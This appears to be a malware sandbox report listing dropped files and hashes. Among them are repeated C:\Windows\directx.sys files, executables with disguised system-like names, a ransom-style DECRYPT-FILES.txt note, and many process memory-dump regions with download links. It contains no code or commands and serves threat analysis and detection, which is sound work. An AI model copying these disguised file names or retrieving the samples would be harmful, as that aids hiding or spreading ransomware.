
SHA256
23c76d68bd2598eb1da21b3320728fe7422c5bf6987a0f3697512123930dbf47

SHA512
e8629ebb048dd96a4d01e52c99c2ec6c5549dfbf10bd9c484f47ea97f55dc9bb6ef4e6e016bef28038438b761ff812999b4fcfd39bf0bc2d17e3357f2ba001e5

Download Submit
C:\Windows\directx.sys

Filesize
418B

MD5
b6df2a60e83363213cd227f97f4b018a

SHA1
42e9ae90448e1d9a47143b931d26dec131daabbe

SHA256
9258a7e9eef32ef3779bf701d033353779ff4204a30185d08b1bcc8f220ad26e

SHA512
a0dfa70a59abd3b01f71cabb998365d4e56f37732a79a34288bcc8d2e083cda7e31bf4845850f6bf11b6ea14f98dfde2d8ecac4cc275c0dbcd651ed56e121e27

Download Submit
C:\Windows\directx.sys

Filesize
411B

MD5
b6a1291d09ff269d89b907fa4443ee38

SHA1
3fa3fe3357113e81e9f3c252bad48485881c4c00

SHA256
278fec0a807eeefc14ef6f0f6f9161d80b62de8abf788539783e3230fff1e3de

SHA512
068c3fd11aceb2cf4ed6beed66549a81a23edc54889e843ccefa92a85c6e41b4c0e7e2d7c3fa57d74b08a9af11e38bb6ea47e3ffa6d94c14717bf9c4990eb18e

Download Submit
C:\Windows\directx.sys

Filesize
414B

MD5
a6494bdfd199365bebfd80bc29a6e864

SHA1
d941a4256fa15030f97fc91eb10ce91766a4ffcf

SHA256
be7c7961e51ed0f29515c80101b3366e4c781262c69f33b6242261e0fa04dea9

SHA512
ca6f359147371017466d2aabf9b35f78d3abab215312931bee7c14a2a614004d38da76d62e3e6d0fe52fd24301d38efc10624b2154c0265a55a57c6936027619

Download Submit
C:\Windows\directx.sys

Filesize
435B

MD5
f90fa8dd940459bfed6f629a3d959a43

SHA1
f18a349a3a5fed1f05ad197701e6e023bfcc9256

SHA256
e95c2309a9e10d053ab6f1e323dcd62aaf481cae41e47740c31d559bb69ce48f

SHA512
046e38cd27fb11f2d7afa7af2ac9a9bea8bc9eeedca043eb5bf1f5b55fa512f013347328376fb54a3449eb576923f0c7c40b1c4b5093d65f9bfb19a4ecc7f224

Download Submit
C:\Windows\directx.sys

Filesize
418B

MD5
88f0d8bd7f91fc39ef71705152f18371

SHA1
c1f1d90d7dd8de34963a976e537483912b9cbaf9

SHA256
9b881803b1d2caf5638474a72f2768c9c30447e867e90daeba338121b52f244b

SHA512
2621b343cc13117aa564ae8dd89b66d0f4ddc62d9d1f0d4aad3c7d9d061ca5d54db4bba12c976aca0a3d11df8d9d539b0171fdc9973fcccbcc68b50f78be8d4e

Download Submit
C:\Windows\directx.sys

Filesize
472B

MD5
7f234356947b05edc7ca36421c542748

SHA1
d4dcd5e282a7db3fec3b8625a640a0a876880168

SHA256
b78a2eafecc4e5168faecc8556c777ee088c28553ff66b8afb90139869046f9a

SHA512
d3c8f4bbe837d623c4c171884f41655ba2423c47f4277af15936f72dceb851e7bf8e1a4da0c904c618bfd43597bef8d94d1ad5ae5a965c7a4f5dd43860be76b4

Download Submit
C:\Windows\directx.sys

Filesize
393B

MD5
107a386baf388bac44f73c28337391fd

SHA1
513deb0272ec3006eb264524dad2949c83d8518d

SHA256
847b7ca35d719a49f818adfeda5c93a330606e8df8d4d4fcba906e72466f2316

SHA512
e4f8477e57c8d41310635ef3a15131f39afacdadd1627f92e122fb080c3903819904e50d5ae3ef2504afcf596da88ca81c903ad6b16aae43f0d5533e08fe7e79

Download Submit
C:\Windows\directx.sys

Filesize
376B

MD5
21ad0c9141dbc682b6a92b0428e6302b

SHA1
5e071305b8103af5fd890e3570f49a9f5b492618

SHA256
b744d2e2295f555a77d2edbe49c8c4c2a10ab39520d1762f96100c7e5ab1ce7a

SHA512
c7240b5758c918ada938ccf244ec62bca5e26163a336d480299360d8a260413720fd6fcb99149efbe0f0ad51afa7aebf5ef9af2189ffeeaa438b8e37438dab0c

Download Submit
C:\Windows\directx.sys

Filesize
375B

MD5
9c716730e9296785958636163ab476b2

SHA1
98fc56a84783b779b92b44f37af750d1757d7b52

SHA256
93171b8fe5bac7be5af622b752a2a23e0a86cf3ec17e9b1596676293cd1a41b1

SHA512
208c3808185cf244cc90ee64897e706890a4a1d880b69657269aab6d868d541e24256447dadad0bc4efee7c98e48d13e6e30f76caf5c3f96d446145c38244aa6

Download Submit
C:\Windows\directx.sys

Filesize
390B

MD5
4ae8586ad414e2d9fe30040b0bccc538

SHA1
c1ec4b7bd2278c893f6c742702d1c8fb6e11bd06

SHA256
11ca1f3ab38aa3ddb8f99d1b20bea5c51d51b638e1e0f892ff0dfcb9d910be45

SHA512
979080504b5f9c9d2f57c78bc9a589b69366747b4dff74171718f674b0555ff8ef6e6a2ffa1d2f0a8784bb1f2c43099f3d867578b58964c15cea305c2d8fc2ee

Download Submit
C:\Windows\directx.sys

Filesize
466B

MD5
96345b7db01a76ea5bbce8c52f122194

SHA1
66b3f6ed2c4325b468f20d4369d4b4e344be67d9

SHA256
66edb0087fa713fd6373f28c0a86c6ab6baa71c154d7e2686c59ae56ee901474

SHA512
8959568ae4749f126ce606071db00caf564bff51bccc058a12532efa26e017740ffc4f098edb5f964b7b511b34fb75222a193191aac89a983ba5dda827708494

Download Submit
C:\Windows\directx.sys

Filesize
504B

MD5
3004b77a54fe18cf7d5308f46b0aed6b

SHA1
6ad8d556f6dbbf03bba16137b6f6db8d6a7362be

SHA256
764d8d515a3ccde2b9bd785ffcc5641d3e8a436acb2344bcc1464ac186cc19d2

SHA512
1f6bd30155478dbabe9e460b37d97bd6a6a62e6169cc96abadadb0145dd7edbe787ee5530bc6e1ddaadc96e70636e71b12ad8bd4f0c2627ba422d59fcd8b85c9

Download Submit
C:\Windows\directx.sys

Filesize
43B

MD5
e08da1f05efb3b6d438640a92d92761c

SHA1
cd8f9ad002181ebf87a3625734498ddc4a50ec59

SHA256
b981c91e4a64e872ae4c83dc193e4a5b3007a36f2b9e24b065aae6105ebd8a52

SHA512
e4c128d705de71ab84d99894deba6e52b01a22d95186008febdffab21084ae3f4ea601bf610a4f94c717f68f00eb177a20b4008c91227671b7b08548a6b1067d

Download Submit
C:\Windows\directx.sys

Filesize
566B

MD5
2a3541b5e80ee4e62fb52c1df18d1b95

SHA1
23a04b30d061be86220eb24ba3fa1fe113b1c831

SHA256
bc39a052b2290b37c0ae417573c1968d5645ebe2482593e9e85074a6f2bcdca5

SHA512
6e19138d37134eb6fe06924bfeb8937597dc3c841b3f64d5a2357d658ee8ff0b74f302e704956dd790b2294b0b850e3ed998667cc653495f503cef1984478b49

Download Submit
C:\Windows\directx.sys

Filesize
549B

MD5
12c33fa7fdbfc29e902f0965464716f4

SHA1
877b9a2c915e8a9dcd95939453da709f59cccf62

SHA256
1f11e2a4c8f2d85899c3fd8ea80ac8d3ecdf986cf141898cf2b42927d4d55968

SHA512
10b3c4a44ed9a277e3794edd3c73f20eeaaad600f102e33338386c8e797dbb40b2241173dd8e8ca919c9f218d669426abd7df0d128d0c88a6f631ee2d3d920cb

Download Submit
C:\Windows\directx.sys

Filesize
594B

MD5
f4e01e0e50838f109a6b6859ace93e2e

SHA1
4e2b0085b01eeccb29e3600a35519f693f0bf90f

SHA256
f999a1f9f2a39904d65abea42555b9b2134e2232cfe8b66d1f4ef491c520d393

SHA512
d0b6b57e06c466d06e711430c8d485f475d30efc74a4c66b0cd383f435d1d54d5189d8ea4cb5e7060b763cb7b860c7f3cb6ec6ea9e8a9e7d4c73247ff4c9f7eb

Download Submit
C:\Windows\directx.sys

Filesize
639B

MD5
8a930bef2ba4788d6e7d0f70ff826d85

SHA1
430c475754b034973337a10de9dd6b977ab6f838

SHA256
4232ce6cad4698c449e3170b2ccb56183f40c2e1324946b0270c9edde4f6e1ea

SHA512
32afdb0cdf2dabb700467b00128b63091c1cee93f468020bcc190e44e632d01d4dea4827d37ca94670abb22d872168a91833bd94b5ae8fe997aba45531491083

Download Submit
C:\Windows\directx.sys

Filesize
648B

MD5
8322306e38960c5d1ab63aff99b269cb

SHA1
91c669e61085127fc8c4df5b69f9368783c4e00c

SHA256
6b609176addc41280a47888610cd2eba02c792eb453ca7f99948276626a22e13

SHA512
1ebaa44de1164e9d515f4565f2f11972613043d1f3b425fc20c5bd4aed56e18d57bfb083f1aa682748fa9661e4f236c0633261544412b72e5ce5adb416d18d21

Download Submit
C:\Windows\directx.sys

Filesize
652B

MD5
90b2506c4340a7504ce977c7e703fe29

SHA1
f996c2a0a4db236bd3e800cc6504a8e9c933f28a

SHA256
a86dfa898abb0f3ce3b46dfefbe36d4a52ddc9b87e8e5adce65657bb717c87a3

SHA512
cc09092f812917dc71fe9a6d607c8e0faea1ca3580fcbd26c9c9ef89c8deca9b3d2a6bd01de5664ba85421c3afba6263130e65f57a678acc56089641fc8604f0

Download Submit
C:\Windows\directx.sys

Filesize
656B

MD5
00c37db7906361a5d28ae99708c30ff2

SHA1
5f57affd020b78b561cb2c230ad8caf2cf43b288

SHA256
b089f2c8592d8ad84c380f025202cb588ce3d1e69173ca3e0bfa0ea51d3238c6

SHA512
11742aa6803d6b5aa083b0effb3660e1b490791279ec3ef08b2607558a9d03d2492a77b566a3fda6019f71045e385aeb7d1f432d2c52f6796029e4a05aa52e36

Download Submit
C:\Windows\directx.sys

Filesize
656B

MD5
19d1b3ff1cf86aa83470da755e7795ff

SHA1
549947196f632d8b8172f98cc1d32507f8356f03

SHA256
fc2028d3aba27cc937768117f6611da0691c9ce6c6ae25c254bdd84eb6ca404f

SHA512
dda12538182a2788156be3c99365a47e00307d7f234e46281f756266edcdaec214433c0e95b966e72fb8eda6da7a75f75450130fe8f853ecb55ded6eda0b6e38

Download Submit
C:\Windows\directx.sys

Filesize
641B

MD5
182cb24d3f797e05280071bc00433c3f

SHA1
a2547d6d32c64ea899869f205893deda8cc395cc

SHA256
247c7700c7f4d95601e027dad6a4b660a8e83a8e1d5c96369f34b8ce655a3c7d

SHA512
e5b9f7f5c378ec49ce0ea7309887cfcfffdf65f3dc2189784c8540353c8c0cfe65e8c4ddf8d0fe3d5b902199a719c9a08cb0a3402460751cc1e4278bb743b251

Download Submit
C:\Windows\directx.sys

Filesize
641B

MD5
18d23fbe2039b4d6fcd6470b41383618

SHA1
110f0ead2b3c02ce1e7ce0ba5d1169a20bc65c65

SHA256
7cf11ed50b7bf475404b5673eadc856bf7ff583abdd53710a3e41bfd02d32507

SHA512
1c5ee699d56dcb57b69830892c64f42328b73dc3840659644834600bc8ca997b446a6f2d0eb4bf277c09adddb4ffedc10a3751bd26eee4f4aae037c068c4744e

Download Submit
C:\Windows\directx.sys

Filesize
651B

MD5
c80de84e4b8d56a31044bf5e594cae36

SHA1
5b464ce6a6775b57f319d3ac62ca2313f9011d77

SHA256
855c1d74d54d606834109f35715643e6a8a0ecc0ebb510e9928f0acffe853150

SHA512
e903da32bd6d4f84d3d295c3012294fe402c3907a6b54f5ebbe212756030080517b39c4cd08a770410a43f2cb9d094e9e8a5e508dbbbbfa44f29623cb56141ad

Download Submit
C:\Windows\directx.sys

Filesize
641B

MD5
3a4327c83961a3cef38926a0ccd75a32

SHA1
2a2da05dea091e186ffa9e1add0330d785cd90a9

SHA256
30441ef7de7ff6f61344d60e1fad8c9802ff0b3e788573f9aca53afefcfdb90c

SHA512
6bf680eb30f493ae49cd032a5c96685a383824e3f54bebb6ed34e01054e7e3e7959be3fc439db5e11da9b107bc7468c05efa15cbb1223621b4e9af4bde6bf34c

Download Submit
C:\Windows\directx.sys

Filesize
654B

MD5
550fbe3558921c3e53073ee59658704a

SHA1
efc3a41f24114cf5e66a8eeec2933898248b77ed

SHA256
206ab94a3f5431d4e908a183b1a78024bc3ffb62e46a22d864bb8a29ada2033a

SHA512
5b7c2ba431f8a209056037123c1f5ea42768ecc8ab54e9e3ed126b910384e8bd642989337ff75fda64e1d2206d69eba8cac682bdc587217dedef9e0c5f70186d

Download Submit
C:\Windows\directx.sys

Filesize
651B

MD5
fe5c6a3a3020c536a3f9a4fb99dc3ee9

SHA1
bec694787ea4781991a8cc53d442a8eda58742e4

SHA256
53f721ab24ed596972bcd86ddb4a9f135aae492fff5f1c895f2efb8c680ea29e

SHA512
b9df0bad186a4ac1d6897c77d5a0eb5effe7717795fde70406a8b35078788c55804cae8ae81a609d0fb3203c5ffa64fb945d3b47d10ad5d779ecab02cbfc8e6b

Download Submit
C:\Windows\directx.sys

Filesize
650B

MD5
76671d06b17c7a7672a3deda5911f19b

SHA1
77284741ec21dfc258a8c5c265c39b66d901058f

SHA256
304da639a977171d0383421ce67b67069694efb6a0057b4224b374c211fb10ae

SHA512
dda60ca230d53afc8d517268d31905f507a779260b07db9de19d209a8eddac9b73ea03efd251cb909d860775761f5573c03a98f2773b65d6b5c808f5377b9e51

Download Submit
C:\Windows\directx.sys

Filesize
656B

MD5
39ca2e04dd8f7ebf67eb587a5c3c47b8

SHA1
56eb9bd91cb9dcc5029b33504106ccfcdd8de424

SHA256
9e1a424f5cf9aa5a729aee0309be56cfe46880977c38c7dda088021d90a0a490

SHA512
ae66601b2eeca6fcd6388733f75994c24be70c49ea52ef876c85018dabb7eaba69aaf66b4237c8f7ae63a5fac89ada81f5784f9bb06d4fcbeb380d98376bb419

Download Submit
C:\Windows\directx.sys

Filesize
86B

MD5
f885d87964363b63dd02fa0764914e34

SHA1
f4040260ce0513af83c51129835e39fc1dc5b8cd

SHA256
6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f

SHA512
054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

Download Submit
C:\Windows\directx.sys

Filesize
654B

MD5
f4d41fbbf3534d7d19bb16181d601e87

SHA1
d1c3c03979233559a231dd67558da9402d31f1ef

SHA256
4c17c0c4bfe6ff4899bca66cf1314a5e048f5578106ff82a7ef2f84d2d6b86e6

SHA512
8e64da4cb8f073d258c5e64cc2a1efc0be7feba5e5d29036714ff9364ac615551ae68212c84f328981bfe83658c239ba54da97eb43efb90de01b14feb6025664

Download Submit
C:\Windows\directx.sys

Filesize
614B

MD5
68116eec39ed991f9cf270384f5ef161

SHA1
22b044e3206b2265cbb88979b0f7bde2c7158c15

SHA256
c68ca6df4dd462bd89bc661e3af2e20279bd7d065f6efa63891cd3403e1fc004

SHA512
f805143214504235540d4a30a1567b2ab7e5bdcda8932cbb159c175149ccf58759c4aa1f010b6ef0f7611e4e55c90d8e03ebff813b858824fdd93270c6fac215

Download Submit
C:\Windows\sysdinrdvs.exe

Filesize
84KB

MD5
161a475bfe57d8b5317ca1f2f24b88fa

SHA1
38fa8a789d3d7570c411ddf4c038d89524142c2c

SHA256
98fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54

SHA512
d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547

Download Submit
C:\Windows\syspplsvc.exe

Filesize
85KB

MD5
10ffc145e1c09190a496a0e0527b4f3f

SHA1
e21fba21a11eecb4bc37638f48aed9f09d8912f6

SHA256
80b7e224f28c6160737a313221b9fc94d5f5e933ae1438afef4b5fae33185b2d

SHA512
bec357e73376f2e9e2963db5f7110a4c90de31a94edfaa7bf59c2f01b7bdd0c33e9a8024e995b7f0e67e332bc4aa0ec1280c7c28a24ba554772f8325e1badd1d

Download Submit
C:\Windows\winakrosvsa.exe

Filesize
14KB

MD5
2f4ab1a4a57649200550c0906d57bc28

SHA1
94bc52ed3921791630b2a001d9565b8f1bd3bd17

SHA256
baa6149b5b917ea3af1f7c77a65e26a34a191a31a9c79726bd60baf4656701fa

SHA512
ab1a59aa4c48f6c7fcf7950f4a68c3b89a56f266681a5aabd0df947af8340676e209d82ddd1997bfebd972b35ca235233b61231335aec4567f7b031e786ea7e8

Download Submit
C:\odt\DECRYPT-FILES.txt

Filesize
10KB

MD5
d800eb41da8eb2ebf2f63b9c632e8995

SHA1
9d183aa7075d56e3ed85e2ec495f80eb7dba46fa

SHA256
7d9b8f5aecfdd56f2fe5abe5a20b0fce2ef8fbfb9c7bca5d66f5eb13ddaf6de0

SHA512
7e673b61c2efec9ea8d1f2d3b5524bff02e5dc95bf1f485b2195ea2a2e8ba7009d1ebd9e327de4f321662b3ada821bccb78d5210f250dae6befac463451f7cd2

Download Submit
C:\odt\OFFICE~1.EXE

Filesize
5.1MB

MD5
02c3d242fe142b0eabec69211b34bc55

SHA1
ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

SHA256
2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

SHA512
0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

Download Submit
memory/272-1129-0x00007FF985FD0000-0x00007FF986A91000-memory.dmp

Filesize
10.8MB

Download
memory/740-160-0x0000000000860000-0x0000000000861000-memory.dmp

Filesize
4KB

Download
memory/740-805-0x0000000000860000-0x0000000000861000-memory.dmp

Filesize
4KB

Download
memory/740-365-0x0000000000400000-0x000000000068E000-memory.dmp

Filesize
2.6MB

Download
memory/984-1348-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2796-265-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/2796-507-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/2796-300-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/3120-600-0x0000000001000000-0x0000000001010000-memory.dmp

Filesize
64KB

Download
memory/3120-414-0x0000000001000000-0x0000000001010000-memory.dmp

Filesize
64KB

Download
memory/3120-598-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/3120-159-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/3120-157-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/3120-158-0x0000000001000000-0x0000000001010000-memory.dmp

Filesize
64KB

Download
memory/3400-108-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/3444-82-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3444-266-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3448-248-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3448-588-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3448-532-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3688-1009-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/3688-886-0x0000000000570000-0x0000000000571000-memory.dmp

Filesize
4KB

Download
memory/3752-48-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/3752-46-0x0000000001650000-0x0000000001681000-memory.dmp

Filesize
196KB

Download
memory/3752-587-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/3752-581-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/4008-373-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/4008-566-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/4336-967-0x0000000000580000-0x0000000000581000-memory.dmp

Filesize
4KB

Download
memory/4336-1041-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4532-827-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/4532-976-0x0000000001850000-0x0000000001860000-memory.dmp

Filesize
64KB

Download
memory/4532-1007-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/4624-590-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-100-0x0000000002320000-0x00000000023EE000-memory.dmp

Filesize
824KB

Download
memory/4624-261-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-107-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-105-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-586-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-537-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-173-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-171-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4624-170-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/4720-161-0x0000000000050000-0x0000000000058000-memory.dmp

Filesize
32KB

Download
memory/4720-1074-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

Filesize
64KB

Download
memory/4720-167-0x0000000004A70000-0x0000000004B0C000-memory.dmp

Filesize
624KB

Download
memory/4720-239-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

Filesize
64KB

Download
memory/4720-118-0x0000000072E50000-0x0000000073600000-memory.dmp

Filesize
7.7MB

Download
memory/4720-584-0x0000000072E50000-0x0000000073600000-memory.dmp

Filesize
7.7MB

Download
memory/4936-964-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4988-1243-0x0000000002E90000-0x0000000002F90000-memory.dmp

Filesize
1024KB

Download
memory/4988-1251-0x0000000004990000-0x00000000049FF000-memory.dmp

Filesize
444KB

Download
memory/4988-1692-0x0000000000400000-0x0000000002D72000-memory.dmp

Filesize
41.4MB

Download
memory/5188-1614-0x00000000000A0000-0x00000000000F2000-memory.dmp

Filesize
328KB

Download
memory/5264-931-0x0000000072E50000-0x0000000073600000-memory.dmp

Filesize
7.7MB

Download
memory/5264-1286-0x0000000072E50000-0x0000000073600000-memory.dmp

Filesize
7.7MB

Download
memory/5264-878-0x0000000000F20000-0x00000000013D0000-memory.dmp

Filesize
4.7MB

Download
memory/5292-1196-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5292-1108-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5372-504-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp

Filesize
2.0MB

Download
memory/5372-474-0x00007FF9667B0000-0x00007FF9667C0000-memory.dmp

Filesize
64KB

Download
memory/5372-466-0x00007FF9667B0000-0x00007FF9667C0000-memory.dmp

Filesize
64KB

Download
memory/5372-506-0x00007FF9667B0000-0x00007FF9667C0000-memory.dmp

Filesize
64KB

Download
memory/5372-540-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp

Filesize
2.0MB

Download
memory/5372-464-0x00007FF9667B0000-0x00007FF9667C0000-memory.dmp

Filesize
64KB

Download
memory/5372-524-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp

Filesize
2.0MB

Download
memory/5372-518-0x00007FF9667B0000-0x00007FF9667C0000-memory.dmp

Filesize
64KB

Download
memory/5372-517-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp

Filesize
2.0MB

Download
memory/5376-1027-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/5376-936-0x00000000005B0000-0x00000000005B1000-memory.dmp

Filesize
4KB

Download
memory/5376-962-0x00000000779F2000-0x00000000779F3000-memory.dmp

Filesize
4KB

Download
memory/5604-541-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp

Filesize
2.0MB

Download
memory/5668-1272-0x0000000000600000-0x0000000000B04000-memory.dmp

Filesize
5.0MB

Download
memory/5740-722-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/5740-583-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/5740-557-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/5740-550-0x00000000019A0000-0x00000000019B0000-memory.dmp

Filesize
64KB

Download
memory/5772-1042-0x00007FF985FD0000-0x00007FF986A91000-memory.dmp

Filesize
10.8MB

Download
memory/5772-562-0x00007FF985FD0000-0x00007FF986A91000-memory.dmp

Filesize
10.8MB

Download
memory/5772-544-0x0000000000EC0000-0x0000000000ECC000-memory.dmp

Filesize
48KB

Download
memory/5772-580-0x0000000002950000-0x0000000002960000-memory.dmp

Filesize
64KB

Download
memory/5772-559-0x00000000028B0000-0x00000000028BC000-memory.dmp

Filesize
48KB

Download
memory/5772-549-0x0000000000ED0000-0x0000000000EDA000-memory.dmp

Filesize
40KB

Download
memory/5772-555-0x0000000000EE0000-0x0000000000EEC000-memory.dmp

Filesize
48KB

Download
memory/5772-520-0x0000000000790000-0x0000000000824000-memory.dmp

Filesize
592KB

Download
memory/5836-579-0x0000000072890000-0x0000000072E41000-memory.dmp

Filesize
5.7MB

Download
memory/5836-585-0x0000000000B90000-0x0000000000BA0000-memory.dmp

Filesize
64KB

Download
memory/5836-576-0x0000000000B90000-0x0000000000BA0000-memory.dmp

Filesize
64KB

Download
memory/5888-554-0x0000000000610000-0x000000000066E000-memory.dmp

Filesize
376KB

Download
memory/5888-824-0x0000000000610000-0x000000000066E000-memory.dmp

Filesize
376KB

Download
memory/5888-533-0x0000000000610000-0x000000000066E000-memory.dmp

Filesize
376KB

Download
memory/5888-521-0x0000000000610000-0x000000000066E000-memory.dmp

Filesize
376KB

Download
memory/5956-885-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/6048-542-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp

Filesize
2.0MB

Download
memory/6076-1167-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/6076-1021-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download